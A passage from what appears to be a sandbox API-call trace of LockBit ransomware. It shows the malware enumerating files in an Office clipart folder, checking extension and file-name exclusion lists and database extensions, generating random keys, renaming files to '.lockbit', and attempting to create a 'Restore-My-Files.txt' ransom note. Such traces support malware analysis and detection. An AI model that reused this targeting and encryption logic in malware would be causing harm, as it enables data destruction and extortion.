pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.819] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.819] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x16f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105384.WMF", cAlternateFileName="")) returned 1 [0138.819] lstrcmpiW (lpString1=".", lpString2="J0105384.WMF") returned -1 [0138.819] lstrcmpiW (lpString1="..", lpString2="J0105384.WMF") returned -1 [0138.819] PathFindExtensionW (pszPath="J0105384.WMF") returned=".WMF" [0138.819] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.819] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.819] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.819] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.819] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.820] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.820] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105384.WMF") returned 1 [0138.821] lstrcmpiW (lpString1="ntldr", lpString2="J0105384.WMF") returned 1 [0138.821] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105384.WMF") returned 1 [0138.821] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105384.WMF") returned -1 [0138.821] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105384.WMF") returned -1 [0138.821] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105384.WMF") returned 1 [0138.821] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105384.WMF") returned -1 [0138.821] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.821] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF") returned=".WMF" [0138.821] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.821] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.821] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.822] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.822] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF.lockbit") returned 72 [0138.822] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105384.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.823] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.823] malloc (_Size=0x40068) returned 0x3ef0008 [0138.823] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=5880) returned 1 [0138.823] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.823] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0138.823] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.824] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0138.824] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0138.828] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.828] malloc (_Size=0xa6) returned 0x77d7a8 [0138.828] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.828] free (_Block=0x77d7a8) [0138.828] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.828] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.829] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x175c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105386.WMF", cAlternateFileName="")) returned 1 [0138.829] lstrcmpiW (lpString1=".", lpString2="J0105386.WMF") returned -1 [0138.829] lstrcmpiW (lpString1="..", lpString2="J0105386.WMF") returned -1 [0138.829] PathFindExtensionW (pszPath="J0105386.WMF") returned=".WMF" [0138.829] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.829] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.830] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.830] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.831] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.831] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.831] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105386.WMF") returned 1 [0138.832] lstrcmpiW (lpString1="ntldr", lpString2="J0105386.WMF") returned 1 [0138.832] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105386.WMF") returned 1 [0138.832] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105386.WMF") returned -1 [0138.832] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105386.WMF") returned -1 [0138.832] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105386.WMF") returned 1 [0138.832] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105386.WMF") returned -1 [0138.832] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.832] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned=".WMF" [0138.832] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.832] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.832] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.833] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.833] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.833] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.833] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.833] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.833] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.833] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.833] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF.lockbit") returned 72 [0138.833] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105386.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.833] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.833] malloc (_Size=0x40068) returned 0x3df0008 [0138.833] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5980) returned 1 [0138.833] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.834] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.834] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.834] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.838] malloc (_Size=0xa6) returned 0x77d7a8 [0138.838] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.839] free (_Block=0x77d7a8) [0138.839] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.839] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.839] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x203c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105388.WMF", cAlternateFileName="")) returned 1 [0138.839] lstrcmpiW (lpString1=".", lpString2="J0105388.WMF") returned -1 [0138.839] lstrcmpiW (lpString1="..", lpString2="J0105388.WMF") returned -1 [0138.839] PathFindExtensionW (pszPath="J0105388.WMF") returned=".WMF" [0138.839] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.839] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.840] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.840] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105388.WMF") returned 1 [0138.841] lstrcmpiW (lpString1="ntldr", lpString2="J0105388.WMF") returned 1 [0138.841] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105388.WMF") returned 1 [0138.841] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105388.WMF") returned -1 [0138.841] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105388.WMF") returned -1 [0138.841] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105388.WMF") returned 1 [0138.841] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105388.WMF") returned -1 [0138.841] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.841] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF") returned=".WMF" [0138.841] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.841] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.841] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".dbf", 